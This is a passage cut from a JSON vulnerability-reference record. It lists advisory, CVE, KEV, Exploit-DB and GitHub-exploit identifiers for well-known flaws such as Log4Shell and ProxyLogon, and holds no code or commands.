"CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:99DAB57F9B8063F8619B1A418B014DF1", "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "CISA:ADBA13BCB35A603303E6E4549200157F", "CISA:CE531246BF5FC97924EF93C811BBA0FF", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:D9F4EE6727B9BF3A40025E9D70945311", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2020-5902", "CISA-KEV-CVE-2021-1497", "CISA-KEV-CVE-2021-20090", "CISA-KEV-CVE-2021-22005", "CISA-KEV-CVE-2021-22205", "CISA-KEV-CVE-2021-26084", "CISA-KEV-CVE-2021-26855", "CISA-KEV-CVE-2021-26857", "CISA-KEV-CVE-2021-26858", "CISA-KEV-CVE-2021-27065", "CISA-KEV-CVE-2021-36260", "CISA-KEV-CVE-2021-40539", "CISA-KEV-CVE-2021-41773", "CISA-KEV-CVE-2021-42013", "CISA-KEV-CVE-2021-42237", "CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2021-45046", "CISA-KEV-CVE-2022-1388", "CISA-KEV-CVE-2022-24112", "CISA-KEV-CVE-2022-26134", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ", "CISCO-SA-APACHE-LOG4J-QRUKNEBD", "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR"]}, {"type": "citrix", "idList": ["CTX267027", "CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cnvd", "idList": ["CNVD-2021-101199", "CNVD-2021-56801", "CNVD-2022-03222", "CNVD-2022-12799", "CNVD-2022-35519", "CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-20122", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-3100", "CVE-2021-36260", "CVE-2021-38703", "CVE-2021-40539", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-42237", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-1388", "CVE-2022-23848", "CVE-2022-24112", "CVE-2022-26134", "CVE-2022-33915", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-22205", "DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-41773", "DEBIANCVE:CVE-2021-42013", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "dsquare", "idList": ["E-688", "E-709", "E-738", "E-739"]}, {"type": "exploitdb", "idList": ["EDB-ID:47297", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48642", "EDB-ID:48711", "EDB-ID:49879", "EDB-ID:49895", "EDB-ID:50243", "EDB-ID:50383", "EDB-ID:50406", "EDB-ID:50441", "EDB-ID:50446", "EDB-ID:50512", "EDB-ID:50532", "EDB-ID:50590", "EDB-ID:50592", "EDB-ID:50829", "EDB-ID:50932", "EDB-ID:50952", "EDB-ID:51183"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171"]}, {"type": "f5", "idList": ["F5:K04082144", "F5:K19026212", "F5:K23605346", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K55879220"]}, {"type": "fedora", "idList": ["FEDORA:00C4C3098596", "FEDORA:0A343304CB93", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:95A5B306879A", "FEDORA:A5A703103140", "FEDORA:BDD0730B86DF"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF"]}, {"type": "fortinet", "idList": ["FG-IR-21-245", "FG-IR-22-398"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "25B78BDD-25B8-11EC-A341-D4C9EF517024", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "D001C189-2793-11EC-8FB1-206A8A720317"]}, {"type": "gentoo", "idList": ["GLSA-202208-20"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", "GHSA-7RJR-3Q55-VV33", "GHSA-FP5R-V3W9-4333", "GHSA-J3CH-VJPH-8Q6V", "GHSA-J7C3-96RF-JRRP", "GHSA-JFH8-C2JP-5V3Q", "GHSA-MF4F-J588-5XM8", "GHSA-V57X-GXFJ-484Q", "GITHUB:0519EA92487B44F364A1B35C85049455", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08", "016A0841-D1FF-5056-B062-0D08FCE624CB", "01A3C858-7694-5E52-A52F-AC07A4CAFAD8", "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "0241DC13-63CB-580C-BDC6-78F8BB03567D", "024D29D3-309F-5B7F-B8C9-2AF149F9A213", "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "0393F812-B016-532F-A498-1B15E2F25D88", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0420DA06-BC6E-5B30-8BA3-E30BDE351E15", "04E3583E-DFED-5D0D-BCF2-1C1230EB666D", "052EB402-154C-59B2-80CF-42FF91E8B731", "05403438-4985-5E78-A702-784E03F724D4", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "059DC199-E425-50EE-B5F5-E351E0323E69", "06076ECD-3FB7-53EC-8572-ABBB20029812", "066BA250-177D-5017-9AC2-6B948A465ABC", "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "07F0F779-CBA8-507A-8268-EFD213F50D06", "0829A67E-3C24-5D54-B681-A7F72848F524", "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "0965CC1C-18E7-5115-A63D-624003944775", "0989C9B1-62A8-505A-B12F-586D7FAADEEE", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A03C474-5159-5D12-82D2-E28FA42B84BB", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0AA6A425-25B1-5D2A-ABA1-2933D3E1DC56", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B2EA860-8578-5853-85A4-F3302749F815", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC014D0-F944-5E78-B5FA-146A8E5D0F8A", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C28A0EC-7162-5D73-BEC9-B034F5392847", "0C3BF793-B508-5082-A673-3882A95A6EDF", "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0CEA12C7-97F6-5BF5-88FF-6797542A037F", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E5BE237-A243-54B8-9AD7-92FBA10D1FA2", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "0F2A170C-ABEB-54C3-9D07-9F1BA8554053", "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2", "1097EF60-FC77-5135-B92B-4A84B46FABAF", "1145F3D1-0ECB-55AA-B25D-A26892116505", "114D719E-11FD-5F49-982D-CB278A7796DB", "11719BED-E629-5C79-944E-7E40BBFC460C", "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "12691014-3333-5741-80A4-3357BD72D2AC", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13364575-934B-5E73-AA03-AEB6910F6AD2", "1348D3BB-7C57-5B0C-9B6B-EE26F534D536", "13542749-F70C-5BAA-A20C-8A464D612535", "136F5B52-10AC-57EC-AFD3-C56855D31685", "1370FA0C-A273-5E82-9EEB-7E2E5628D23E", "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "1405211A-94E2-5ECA-BF96-441D2FF564CB", "1406F2B7-7907-5BCF-947E-0DB31B9F014C", "141F2E38-979B-50B5-B649-96785B255523", "14482532-2406-58DF-89FF-30B085015257", "14573955-860C-5947-8F2F-86347A606742", "149F99C3-6B62-5255-8DA6-A0370E6ED5F7", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "1504582F-1A1E-5CA1-A07C-FB05DECB01A9", "152D4F4D-1599-54AE-9A00-A593A379AE0A", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16C11F1E-B5B4-508E-8238-6BF3458B34D3", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17B2C229-06F1-5A30-9E3A-ED9E23DA3F13", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "18A205C9-C2EE-55CC-9BFD-4054390F94E9", "18D647E9-D7D4-5591-B16C-05D007AFD726", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1A3F2735-FB81-52A4-BF5F-FD8A728C3CA9", "1A808CE9-B43C-50A7-A06E-75B3C5A7D5AC", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B09A058-8036-572B-905F-1054D924243B", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1B75F2E2-5B30-58FA-98A4-501B91327D7F", "1B780B5D-F60A-5066-A44B-253EADDAC5CF", "1B8CBBEC-5ABA-5792-8D2A-A51EB4CC6352", "1BB783DD-7876-56F2-A6AC-152AF39E064C", "1BF999D3-0E32-5C04-820B-BB91E950147C", "1C354B89-0050-508B-98F4-B43CBD84F364", "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "1C9826FA-B0AD-5C2E-81E6-5842CAA51C4B", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "1E5E8601-B107-5E10-BB37-0A7C7BB2926D", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "1E6E9010-4BDF-5C30-951C-79C280B90883", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "1F907E1E-A975-55B6-BAFC-80A32B2DDAE7", "1F9C946C-1533-5835-B5E8-641EF4FFC145", "20869A6E-1505-5A22-A2AB-A712FA03D363", "20B1E4FC-65ED-596C-8628-7E9871F2762B", "20BFC1D4-CB1E-51CF-82D8-E4258142BB69", "2108729F-1E99-54EF-9A4B-47299FD89FF2", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21D540EC-C4D0-5076-92B2-AA746AF7AEE4", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "228C8A28-3BE8-51C1-A7B0-993047B4EC76", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "2444574D-533F-593F-8E0E-68EA2B47EF55", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "2481D5F6-C105-5158-B4AF-B67D7BA244A3", "24ADD37D-C8A1-5671-A0F4-378760FC69AC", "252F889F-2BFB-5D8D-B1CD-63075FB7EC34", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "256984DC-A742-53F8-889F-2071EC134734", "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "26F41B84-2AAF-5C6C-BE06-461FF65C6D03", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27108E72-8DC1-53B5-97D9-E869CA13EFF7", "27760EBF-2681-5AF4-B884-18C8BED5127A", "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "283DB4E7-F12E-5601-8E71-19E597504268", "2849E613-8689-58E7-9C55-A0616B66C91A", "28E888C4-78E3-5F8D-B316-AB42FED892F9", "28EB1599-0E12-5ECA-8368-08DD51291F7F", "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "28F29C06-FF69-5E55-A2FB-581179E3923A", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A177215-CE4A-5FA7-B016-EEAF332D165C", "2A80D982-2C57-5BA2-86CB-6169F3859086", "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2B297EB1-A602-5F7B-B21B-C34BC6EB4308", "2B2A8A69-A893-5E85-8B02-6D8A77B54853", "2B4FEB27-377B-557B-AE46-66D677D5DA1C", "2BE2BF2C-B78F-5C34-A4D4-484F0E6B6D9C", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D1EC4D1-0622-570B-9758-054B79393D26", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2D36D631-FAE1-5508-9C60-F4B807EC6C47", "2D3AD059-4772-527B-A78C-724AFA1B109F", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "2F792C33-6CC6-58F1-9166-4DEA421DE2C3", "2F83846E-DF16-5074-98CB-01158DE1C6C6", "3019C843-FE2F-527C-B7C1-14A1C3066721", "305ADB34-3669-5AAD-8D51-FCFFEF9E3F47", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "31DB22CD-3492-524F-9D26-035FC1086A71", "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "321617C5-08C5-5919-9510-2571831D052E", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34793974-B475-5BC4-BAAA-64FE57D0B3D9", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "350E6199-FA83-5A2F-91D3-19E2D2921801", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "35A70212-DFFC-5B38-8294-2B835B8080DE", "35B21CE7-1E51-5824-B70E-36480A6E8763", "365CD0B0-D956-59D6-9500-965BF4017E2D", "36AAE05E-CAAA-5F55-AA88-65599F1EAA1C", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "3749CB78-BE3A-5018-8838-CA693845B5BD", "37A9128D-17C4-50FF-B025-5FC3E0F3F338", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "37EE4A49-AEF7-5A71-AC1C-4B55CB94DD92", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39093366-D071-5898-A67D-A99B956B6E73", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "39F82C2F-7DA7-5CE4-8579-07B95EDCAC65", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3AAA878D-C72A-52A0-A5B6-0977BAF6F01D", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3AFE745D-D706-5B84-B2C7-205590936BBF", "3B159471-590A-5941-ADED-20F4187E8C63", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3C5B500C-1858-5834-9D23-38DBE44AE969", "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "3CF66144-235E-5F7A-B889-113C11ABF150", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3DFE8091-03AE-565B-A198-BD509784502C", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3E66E49D-6A9B-530D-AF77-12B96257655A", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3F29DC5F-237B-53EB-B173-8F4751FE66A7", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "400AD2B4-EBCE-5934-92E0-C32C59BFA420", "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "40E34754-5867-501F-B0F2-FD63C406B6FB", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "418BE453-0A45-5824-8B13-1994DF7349FF", "42098CCD-C708-53FC-B3CD-5A8356B69359", "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "423DF4D5-60AF-5663-B196-2A67DD13D226", "4288177C-C609-5D55-A845-D6785929AB4D", "431446A1-D76F-5889-BBDD-1C55456A4D73", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "43CEFD04-EB9B-5765-AB94-8FF76127F1F6", "4427DEE4-E1E2-5A16-8683-D74750941604", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "44E43BB7-6255-58E7-99C7-C3B84645D497", "44FE14C8-E55B-5B5B-B7BF-87BCCA873425", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "45F0EB7B-CE04-5103-9D40-7379AE4B6CDD", "462BC7E9-407D-550A-9C52-4CEAA3B7115F", "464D6B41-AE5F-5E93-BD26-6E6C8E9F80BC", "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "469B060E-C585-599E-A0D1-AD5D186F70FD", "46FA259E-5429-580C-B1D5-D1F09EB90023", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "4804958E-7699-5226-91C3-8110A4CBAB18", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "495E99E5-C1B0-52C1-9218-384D04161BE4", "4987606C-EB9B-581F-913D-36468DE9160E", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49D58681-03E3-5607-8475-366F990C3706", "4A0D603B-6526-5D1E-BADC-55B4775C354B", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4AA50D81-1CFC-5DDC-804E-F50243E3E9C7", "4B070EB0-B690-5547-8809-F1A697118957", "4B1144E7-81BE-50B3-8FD7-3B6D0BCC50C2", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B25D88E-3B3F-5756-B942-7244492EB7F4", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4B44115D-85A3-5E62-B9A8-5F336C24673F", "4B46EB21-DF1F-5D84-AE44-9BCFE311DFB9", "4B483361-402B-56C9-8223-D272899EA50E", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4BFF94C3-8D58-58E9-B475-3EF032132F84", "4C03A6F0-84D7-565A-B0D8-DE45D804A835", "4C6A108D-3631-56AD-8C3B-9677A228693B", "4C79D8E5-D595-5460-AA84-18D4CB93E8FC", "4CB3AC5D-871A-50AC-9037-FF9B2CBD474A", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "4DBC05D1-8178-5715-953D-61ECC89104F4", "4E4BAF15-6430-514A-8679-5B9F03584B71", "4E59AAA3-7DBF-5E34-BD91-8F83E0E65CEB", "4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F", "4EF65F17-86D3-5B3F-93C7-0BBFD0815E90", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F57CC9C-B908-544E-92E7-92A49DE89B00", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "4FD3A97A-9BE6-5A1E-AE21-241CC188CDE7", "500CE683-17EB-5776-8EF6-85122451B145", "506F4ED7-477B-50E3-9250-1C6A31D8C357", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "51F21941-30E2-5FD0-986D-88D74D835300", "5233D0F2-69A2-5220-8016-07D66C226F01", "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "52E35A88-6217-55CC-B812-4EE83CECD8EB", "5312D04F-9490-5472-84FA-86B3BBDC8928", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "53CC55D8-983C-5FA9-AE81-D20750A6612E", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "5644D9A0-3A8F-52F3-AE3E-300C79911A07", "56C96510-5E6E-56F0-ABEC-852EF4E3F53C", "56FCCA36-707C-5527-A9EF-728C3490C6FC", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "58ACC402-1947-5FE3-9D08-021A4EFEC48A", "58F1E19B-12E9-5FE1-90C6-14688FEE3C8C", "594C33E1-9EBF-5B3B-BA76-031ACB500518", "5A54F5DA-F9C1-508B-AD2D-3E45CD647D31", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5ADD851A-6D91-54B6-8986-62346355A89F", "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "5B55C912-08F2-542D-B6F4-EE8AF664AEAC", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5D88E443-7AB2-5034-910D-D52A5EFFF5FC", "5DB14853-1EDB-5A80-BD98-BB388CC80401", "5DD13827-3FCE-5166-806D-088441D41514", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FA49DC6-482A-5049-8457-45D3555BF0D5", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "5FDC1BB6-C937-5F78-BB2D-71584272E00A", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "60ABBBF7-1E1C-5205-A55E-11D051E0FCC7", "6102FE6D-37F6-572D-8877-F3A0D49FC22D", "61075B23-F713-537A-9B84-7EB9B96CF228", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "628A345B-5FD8-5A2F-8782-9125584E4C89", "62B12BCA-365B-5124-A855-343665612E53", "62DD4AE7-260C-56D3-A80F-8E57DE5BF198", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "637FA72A-45F0-5611-85EB-A28965CFDB93", "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "64D0ED0A-E1C0-57F4-B874-CAB63E7D858C", "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "65D56BCD-234F-52E5-9388-7D1421B31B1B", "65EB18B2-8DBB-5A70-9080-C6DA4451D7E7", "6600C311-30E5-566D-98F1-AC47E752EBEA", "66468422-89C0-5AC8-9CEA-6B512338FF7C", "66506397-D518-518F-B4A6-3C3F99602E30", "66904DD3-2D0B-5C1E-8FFC-FD207B41F6EB", "674BA200-C494-57E6-B1B4-1672DDA15D3C", "6758CFA9-271A-5E99-A590-E51F4E0C5046", "6787DC40-24C2-5626-B213-399038EFB0E9", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68A13FF0-60E5-5A29-9248-83A940B0FB02", 